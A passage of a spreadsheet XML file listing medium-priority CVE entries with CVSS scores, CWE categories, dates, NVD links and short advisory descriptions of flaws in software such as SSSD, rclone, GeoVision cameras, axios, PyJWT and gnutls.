    <row r="2884">
      <c r="A2884" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2884" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87776</t>
        </is>
      </c>
      <c r="C2884" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2884" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2884" s="5" t="inlineStr"/>
      <c r="F2884" s="5" t="inlineStr"/>
      <c r="G2884" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2884" s="5" t="inlineStr"/>
      <c r="I2884" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2884" s="5" t="inlineStr"/>
      <c r="K2884" s="5" t="inlineStr">
        <is>
          <t>CWE-401, CWE-459</t>
        </is>
      </c>
      <c r="L2884"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M2884" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87776</t>
        </is>
      </c>
    </row>
    <row r="2885">
      <c r="A2885" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2885" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87853</t>
        </is>
      </c>
      <c r="C2885" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2885" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2885" s="5" t="inlineStr"/>
      <c r="F2885" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2885" s="5" t="inlineStr"/>
      <c r="H2885" s="5" t="inlineStr"/>
      <c r="I2885" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2885" s="5" t="inlineStr"/>
      <c r="K2885" s="5" t="inlineStr">
        <is>
          <t>CWE-187</t>
        </is>
      </c>
      <c r="L2885" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in SSSD's IdP authentication provider. The eval_access_token_buf() function compares the OIDC subject identifier using strncmp() with the authenticated user's identifier length, performing a prefix comparison instead of an exact match. An attacker whose IdP identifier is a strict prefix of a target user's identifier can authenticate as the target user.</t>
        </is>
      </c>
      <c r="M2885" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87853</t>
        </is>
      </c>
    </row>
    <row r="2886">
      <c r="A2886" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2886" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87908</t>
        </is>
      </c>
      <c r="C2886" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2886" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2886" s="5" t="inlineStr"/>
      <c r="F2886" s="5" t="inlineStr"/>
      <c r="G2886" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2886" s="5" t="inlineStr"/>
      <c r="I2886" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2886" s="5" t="inlineStr"/>
      <c r="K2886" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2886"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M2886" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87908</t>
        </is>
      </c>
    </row>
    <row r="2887">
      <c r="A2887" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2887" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88045</t>
        </is>
      </c>
      <c r="C2887" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2887" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2887" s="5" t="inlineStr"/>
      <c r="F2887" s="5" t="inlineStr"/>
      <c r="G2887" s="5" t="inlineStr"/>
      <c r="H2887" s="5" t="inlineStr"/>
      <c r="I2887" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2887" s="5" t="inlineStr"/>
      <c r="K2887" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="L2887" s="5" t="inlineStr">
        <is>
          <t>rclone is a command-line program to sync files and directories to and from different cloud storage providers. From 1.75.0 until 1.75.1, the serve S3 streamed multipart path in cmd/serve/s3/multipart.go passes attacker-controlled contentLength to multipart.NewRW().Reserve before reading request-body bytes. waitForTurn admits the current part and one oversized part when the buffer is empty despite --multipart-streaming-buffer-limit, and lib/pool allocates 1 MiB pages according to Content-Length or X-Amz-Decoded-Content-Length. A network client can retain or multiply these reservations without sending the declared body, exhausting process or host memory or permanently blocking request handlers. Anonymous S3 deployments require no credentials, while deployments using auth_key require an accepted S3 key. This issue is fixed in version 1.75.1.</t>
        </is>
      </c>
      <c r="M2887" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88045</t>
        </is>
      </c>
    </row>
    <row r="2888">
      <c r="A2888" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2888" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88286</t>
        </is>
      </c>
      <c r="C2888" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2888" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2888" s="5" t="inlineStr"/>
      <c r="F2888" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2888" s="5" t="inlineStr"/>
      <c r="H2888" s="5" t="inlineStr"/>
      <c r="I2888" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2888" s="5" t="inlineStr"/>
      <c r="K2888" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2888" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 improperly manages PTZ connection state, allowing an unauthenticated remote client to block the accept loop and prevent new PTZ connections.</t>
        </is>
      </c>
      <c r="M2888" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88286</t>
        </is>
      </c>
    </row>
    <row r="2889">
      <c r="A2889" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2889" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88287</t>
        </is>
      </c>
      <c r="C2889" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2889" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2889" s="5" t="inlineStr"/>
      <c r="F2889" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2889" s="5" t="inlineStr"/>
      <c r="H2889" s="5" t="inlineStr"/>
      <c r="I2889" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2889" s="5" t="inlineStr"/>
      <c r="K2889" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L2889" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 fails to bound the number of Scopes tokens in unauthenticated ONVIF WS-Discovery Probe requests, allowing a remote attacker to corrupt stack control state and crash the discovery process.</t>
        </is>
      </c>
      <c r="M2889" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88287</t>
        </is>
      </c>
    </row>
    <row r="2890">
      <c r="A2890" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2890" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88289</t>
        </is>
      </c>
      <c r="C2890" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2890" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2890" s="5" t="inlineStr"/>
      <c r="F2890" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2890" s="5" t="inlineStr"/>
      <c r="H2890" s="5" t="inlineStr"/>
      <c r="I2890" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2890" s="5" t="inlineStr"/>
      <c r="K2890" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L2890" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.14 (260903) fails to validate attacker-controlled variable-length fields before copying them into fixed-size stack buffers in multiple VLSVR request handlers, allowing an unauthenticated remote attacker to crash the VLSVR service.</t>
        </is>
      </c>
      <c r="M2890" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88289</t>
        </is>
      </c>
    </row>
    <row r="2891">
      <c r="A2891" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2891" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88290</t>
        </is>
      </c>
      <c r="C2891" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2891" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2891" s="5" t="inlineStr"/>
      <c r="F2891" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2891" s="5" t="inlineStr"/>
      <c r="H2891" s="5" t="inlineStr"/>
      <c r="I2891" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2891" s="5" t="inlineStr"/>
      <c r="K2891" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2891" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.14 (260903) allows unauthenticated clients to declare unbounded VLSVR frame lengths and indefinitely delay blocking receives, allowing remote exhaustion of memory, connection, and worker resources.</t>
        </is>
      </c>
      <c r="M2891" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88290</t>
        </is>
      </c>
    </row>
    <row r="2892">
      <c r="A2892" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2892" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8862</t>
        </is>
      </c>
      <c r="C2892" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2892" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2892" s="5" t="inlineStr"/>
      <c r="F2892" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2892" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2892" s="5" t="inlineStr">
        <is>
          <t>ibm:netezza_performance_server</t>
        </is>
      </c>
      <c r="I2892" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2892" s="5" t="inlineStr"/>
      <c r="K2892" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L2892" s="5" t="inlineStr">
        <is>
          <t>IBM Netezza Software 11.3.0.3 through Interim Fix 002 has credentials that are hardcoded in the application source code, allowing unauthorized access to the container registry. The exposed secret enables attackers to pull private container images, potentially revealing proprietary code, configuration details, and other sensitive information.</t>
        </is>
      </c>
      <c r="M2892" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8862</t>
        </is>
      </c>
    </row>
    <row r="2893">
      <c r="A2893" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2893" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9166</t>
        </is>
      </c>
      <c r="C2893" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2893" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2893" s="5" t="inlineStr"/>
      <c r="F2893" s="5" t="inlineStr"/>
      <c r="G2893" s="5" t="inlineStr"/>
      <c r="H2893" s="5" t="inlineStr"/>
      <c r="I2893" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2893" s="5" t="inlineStr"/>
      <c r="K2893" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2893" s="5" t="inlineStr">
        <is>
          <t>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in GIS Informatics GisLab Laboratory Management System allows Path Traversal.
This issue affects GisLab Laboratory Management System: from 1.4.03 before 1.5.</t>
        </is>
      </c>
      <c r="M2893" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9166</t>
        </is>
      </c>
    </row>
    <row r="2894">
      <c r="A2894" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2894" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-1249</t>
        </is>
      </c>
      <c r="C2894" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2894" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2894" s="5" t="inlineStr"/>
      <c r="F2894" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2894" s="5" t="inlineStr"/>
      <c r="H2894" s="5" t="inlineStr"/>
      <c r="I2894" s="5" t="inlineStr">
        <is>
          <t>2024-04-17</t>
        </is>
      </c>
      <c r="J2894" s="5" t="inlineStr"/>
      <c r="K2894" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L2894" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Keycloak's OIDC component in the "checkLoginIframe," which allows unvalidated cross-origin messages. This flaw allows attackers to coordinate and send millions of requests in seconds using simple code, significantly impacting the application's availability without proper origin validation for incoming messages.</t>
        </is>
      </c>
      <c r="M2894" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-1249</t>
        </is>
      </c>
    </row>
    <row r="2895">
      <c r="A2895" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2895" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13608</t>
        </is>
      </c>
      <c r="C2895" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2895" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2895" s="5" t="inlineStr"/>
      <c r="F2895" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2895" s="5" t="inlineStr"/>
      <c r="H2895" s="5" t="inlineStr"/>
      <c r="I2895" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J2895" s="5" t="inlineStr"/>
      <c r="K2895" s="5" t="inlineStr">
        <is>
          <t>CWE-923</t>
        </is>
      </c>
      <c r="L2895" s="5" t="inlineStr">
        <is>
          <t>A flaw in the libcurl SASL negotiation for LDAP authentication allows an
incomplete handshake sequence to be misinterpreted as a successful
cryptographic verification. An attacker executing a Man-in-the-Middle (MITM)
attack can inject a premature or shortcut response that bypasses complete peer
validation.</t>
        </is>
      </c>
      <c r="M2895" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13608</t>
        </is>
      </c>
    </row>
    <row r="2896">
      <c r="A2896" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2896" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18489</t>
        </is>
      </c>
      <c r="C2896" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2896" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2896" s="5" t="inlineStr"/>
      <c r="F2896" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2896" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2896" s="5" t="inlineStr"/>
      <c r="I2896" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2896" s="5" t="inlineStr"/>
      <c r="K2896" s="5" t="inlineStr">
        <is>
          <t>CWE-488</t>
        </is>
      </c>
      <c r="L2896" s="5" t="inlineStr">
        <is>
          <t>IBM ContextForge MCP Gateway - Translate utility &lt;= 1.0.8 MCP Context Forge could allow a remote attacker to obtain sensitive information from other sessions due to exposure of data elements to the wrong session.</t>
        </is>
      </c>
      <c r="M2896" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18489</t>
        </is>
      </c>
    </row>
    <row r="2897">
      <c r="A2897" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2897" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19651</t>
        </is>
      </c>
      <c r="C2897" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2897" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2897" s="5" t="inlineStr"/>
      <c r="F2897" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2897" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H2897" s="5" t="inlineStr"/>
      <c r="I2897" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2897" s="5" t="inlineStr"/>
      <c r="K2897" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2897" s="5" t="inlineStr">
        <is>
          <t>IBM Enterprise Build of Quarkus 3.27.1 through 3.27.5, and 3.33.1 through 3.33.3  could allow an attacker to bypass authorization by manipulating URL query parameters due to incorrect mapping of values to untrusted query string input.</t>
        </is>
      </c>
      <c r="M2897" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19651</t>
        </is>
      </c>
    </row>
    <row r="2898">
      <c r="A2898" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2898" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32589</t>
        </is>
      </c>
      <c r="C2898" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2898" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2898" s="5" t="inlineStr"/>
      <c r="F2898" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2898" s="5" t="inlineStr">
        <is>
          <t>red hat</t>
        </is>
      </c>
      <c r="H2898" s="5" t="inlineStr">
        <is>
          <t>redhat:mirror_registry_for_red_hat_openshift, redhat:quay</t>
        </is>
      </c>
      <c r="I2898" s="5" t="inlineStr">
        <is>
          <t>2026-04-08</t>
        </is>
      </c>
      <c r="J2898" s="5" t="inlineStr"/>
      <c r="K2898" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2898" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Red Hat Quay's container image upload process. An authenticated user with push access to any repository on the registry can interfere with image uploads in progress by other users, including those in repositories they do not have access to. This could allow the attacker to read, modify, or cancel another user's in-progress image upload.</t>
        </is>
      </c>
      <c r="M2898" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32589</t>
        </is>
      </c>
    </row>
    <row r="2899">
      <c r="A2899" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2899" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-3833</t>
        </is>
      </c>
      <c r="C2899" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2899" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2899" s="5" t="inlineStr"/>
      <c r="F2899" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2899" s="5" t="inlineStr"/>
      <c r="H2899" s="5" t="inlineStr">
        <is>
          <t>gnu:gnutls, redhat:enterprise_linux, redhat:hardened_images, redhat:openshift_container_platform</t>
        </is>
      </c>
      <c r="I2899" s="5" t="inlineStr">
        <is>
          <t>2026-04-30</t>
        </is>
      </c>
      <c r="J2899" s="5" t="inlineStr"/>
      <c r="K2899" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="L2899" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in gnutls. This vulnerability occurs because gnutls performs case-sensitive comparisons of `nameConstraints` labels, specifically for `dNSName` (DNS) or `rfc822Name` (email) constraints within `excludedSubtrees` or `permittedSubtrees`. A remote attacker can exploit this by crafting a leaf certificate with casing differences in the Subject Alternative Name (SAN), leading to a policy bypass where a certificate that should be rejected is instead accepted. This could result in unauthorized access or information disclosure.</t>
        </is>
      </c>
      <c r="M2899" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-3833</t>
        </is>
      </c>
    </row>
    <row r="2900">
      <c r="A2900" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2900" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42033</t>
        </is>
      </c>
      <c r="C2900" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2900" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2900" s="5" t="inlineStr"/>
      <c r="F2900" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2900" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2900" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I2900" s="5" t="inlineStr">
        <is>
          <t>2026-04-24</t>
        </is>
      </c>
      <c r="J2900" s="5" t="inlineStr"/>
      <c r="K2900" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-915</t>
        </is>
      </c>
      <c r="L2900" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, when Object.prototype has been polluted by any co-dependency with keys that axios reads without a hasOwnProperty guard, an attacker can (a) silently intercept and modify every JSON response before the application sees it, or (b) fully hijack the underlying HTTP transport, gaining access to request credentials, headers, and body. The precondition is prototype pollution from a separate source in the same process. This vulnerability is fixed in 1.15.1 and 0.31.1.</t>
        </is>
      </c>
      <c r="M2900" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42033</t>
        </is>
      </c>
    </row>
    <row r="2901">
      <c r="A2901" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2901" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48079</t>
        </is>
      </c>
      <c r="C2901" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2901" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2901" s="5" t="inlineStr"/>
      <c r="F2901" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2901" s="5" t="inlineStr"/>
      <c r="H2901" s="5" t="inlineStr"/>
      <c r="I2901" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J2901" s="5" t="inlineStr"/>
      <c r="K2901" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="L2901" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. Prior to version 1.0.2, when a user navigates to the `/logout` page, the page's server-side load handler deletes the `access_token` cookie before calling `/api/auth/logout` via an internal `event.fetch()`. The internal fetch consequently runs without the auth cookie, so `apiAuthHandle` rejects it, the logout handler never executes, and `SessionService.revokeSession()` is never called for the current session. The DB session row remains valid until its natural expiry (one week by default). The user sees a successful logout (cookie gone, UI returns to login), but any party still holding a copy of the now-deleted access token can continue making authenticated API calls until the session naturally expires. The root cause is a simple ordering mistake. The same auth subsystem implements the correct order in `/api/auth/logout`: revoke the current DB session first, then delete the cookie. The page-level wrapper does the opposite. Version 1.0.2 initiates server-side logout before removing authentication cookies and first appears in version 1.0.2. Version 2.0.0 later replaces this with a race-free client-side logout flow.</t>
        </is>
      </c>
      <c r="M2901" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48079</t>
        </is>
      </c>
    </row>
    <row r="2902">
      <c r="A2902" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2902" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48084</t>
        </is>
      </c>
      <c r="C2902" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2902" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2902" s="5" t="inlineStr"/>
      <c r="F2902" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2902" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="H2902" s="5" t="inlineStr"/>
      <c r="I2902" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J2902" s="5" t="inlineStr"/>
      <c r="K2902" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="L2902" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. Versions prior to 1.0.2 don't throttle failed passphrase login attempts. An attacker can submit unlimited wrong passphrase guesses against any known email address, capped only by the Argon2 verification cost (about 100 milliseconds per attempt on the tested host, giving 10 attempts per second sustained). The same backend implements a working per-account throttle on the WebAuthn challenge endpoint, which returns HTTP 429 after roughly 19 attempts. The passphrase branch simply does not invoke that throttle, leaving a supported high-value login path unprotected against credential stuffing and dictionary attacks. The asymmetry confirms this is an oversight rather than a design choice. The throttle infrastructure exists, is wired into the same auth backend, and works on the WebAuthn path. The passphrase branch in `/api/auth/login` was not updated to record failed attempts. Combined with the application's minimum-passphrase policy (12 characters, no entropy or dictionary checks), accounts using common base patterns such as `Spring2026!XX` or words from a leak corpus are realistically reachable in days on a single CPU, hours on a small GPU farm. Version 1.0.2 patches the issue.</t>
        </is>
      </c>
      <c r="M2902" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48084</t>
        </is>
      </c>
    </row>
    <row r="2903">
      <c r="A2903" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2903" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48526</t>
        </is>
      </c>
      <c r="C2903" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2903" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2903" s="5" t="inlineStr"/>
      <c r="F2903" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2903" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2903" s="5" t="inlineStr">
        <is>
          <t>pyjwt_project:pyjwt</t>
        </is>
      </c>
      <c r="I2903" s="5" t="inlineStr">
        <is>
          <t>2026-05-28</t>
        </is>
      </c>
      <c r="J2903" s="5" t="inlineStr"/>
      <c r="K2903" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-347</t>
        </is>
      </c>
      <c r="L2903" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, when the verifier is decoding JSON Web Tokens, while supporting both asymmetric and HMAC algorithms, the library does not validate use of JSON Web Keys in HMAC algorithm, allowing attacker to use the issuer public key as the secret key for HMAC algorithm. This vulnerability is fixed in 2.13.0.</t>
        </is>
      </c>
      <c r="M2903" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48526</t>
        </is>
      </c>
    </row>
    <row r="2904">
      <c r="A2904" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2904" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50577</t>
        </is>
      </c>
      <c r="C2904" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="D2904" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2904" s="5" t="inlineStr"/>
      <c r="F2904" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2904" s="5" t="inlineStr"/>
      <c r="H2904" s="5" t="inlineStr"/>
      <c r="I2904" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2904" s="5" t="inlineStr"/>
      <c r="K2904" s="5" t="inlineStr">
        <is>
          <t>CWE-323</t>
        </is>
      </c>
      <c r="L2904" s="5" t="inlineStr">
        <is>
          <t>ePA 3.x Integration implements the authorization workflow and writes Medical Information Objects to Germany's electronic patient record. Prior to 1.3.0, ePA 3.x Integration leaves request_counter unchanged in app/vau/VAUProtokoll.py while constructing VAU messages. The frozen client request counter causes the server side to reuse AES-GCM nonce and key combinations across responses. A network attacker who collects repeated ciphertexts can recover the XOR of plaintexts and use predictable inner HTTP headers and JSON fields to recover sensitive data, including patient health records. Repeated nonces can also enable recovery of the GHASH authentication key through the Joux forbidden attack, allowing forged AES-GCM messages and injection of malicious responses. The response-counter check also fails to maintain last_response_counter, weakening replay and ordering validation. This issue is fixed in version 1.3.0.</t>
        </is>
      </c>
      <c r="M2904" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50577</t>
        </is>
      </c>
    </row>
